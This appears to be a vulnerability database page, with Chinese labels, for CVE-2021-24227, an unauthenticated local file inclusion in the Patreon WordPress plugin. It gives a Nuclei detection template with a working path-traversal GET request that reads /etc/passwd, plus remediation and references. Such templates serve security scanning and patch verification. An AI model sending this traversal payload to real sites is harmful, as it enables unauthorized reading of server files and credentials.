CVE-2021-24227: Patreon WordPress <1.7.0 - Unauthenticated Local File Inclusion

日期: 2025-08-01 | 影响软件: Patreon WordPress | POC: 已公开

漏洞描述

Patreon WordPress before version 1.7.0 is vulnerable to unauthenticated local file inclusion that could be abused by anyone visiting the site. Exploitation by an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies.

PoC代码[已公开]

id: CVE-2021-24227

info:
  name: Patreon WordPress  <1.7.0 - Unauthenticated Local File Inclusion
  author: theamanrawat
  severity: high
  description: Patreon WordPress before version 1.7.0 is vulnerable to unauthenticated local file inclusion that could be abused by anyone visiting the site. Exploitation by an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise of the system.
  remediation: |
    Upgrade to Patreon WordPress plugin version 1.7.0 or later to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/f62df02d-7678-440f-84a1-ddbf09364016
    - https://wordpress.org/plugins/patreon-connect/
    - https://jetpack.com/2021/03/26/vulnerabilities-found-in-patreon-wordpress-plugin/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24227
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-24227
    cwe-id: CWE-200
    epss-score: 0.33001
    epss-percentile: 0.96762
    cpe: cpe:2.3:a:patreon:patreon_wordpress:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: patreon
    product: patreon_wordpress
    framework: wordpress
  tags: cve,cve2021,wordpress,patreon-connect,unauth,lfi,patreon,wp,wpscan

http:
  - method: GET
    path:
      - "{{BaseURL}}/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a387c543f1b8a4e4a8a61c053ac3d2c2de65db8d49a7d992cf0e7407ddca4672022100f05f446f03f6411a39974344adc54ed2db5395cf8269269d05109c95230aeb18:922c64590222798bb761d5b6d8e72950

相关漏洞推荐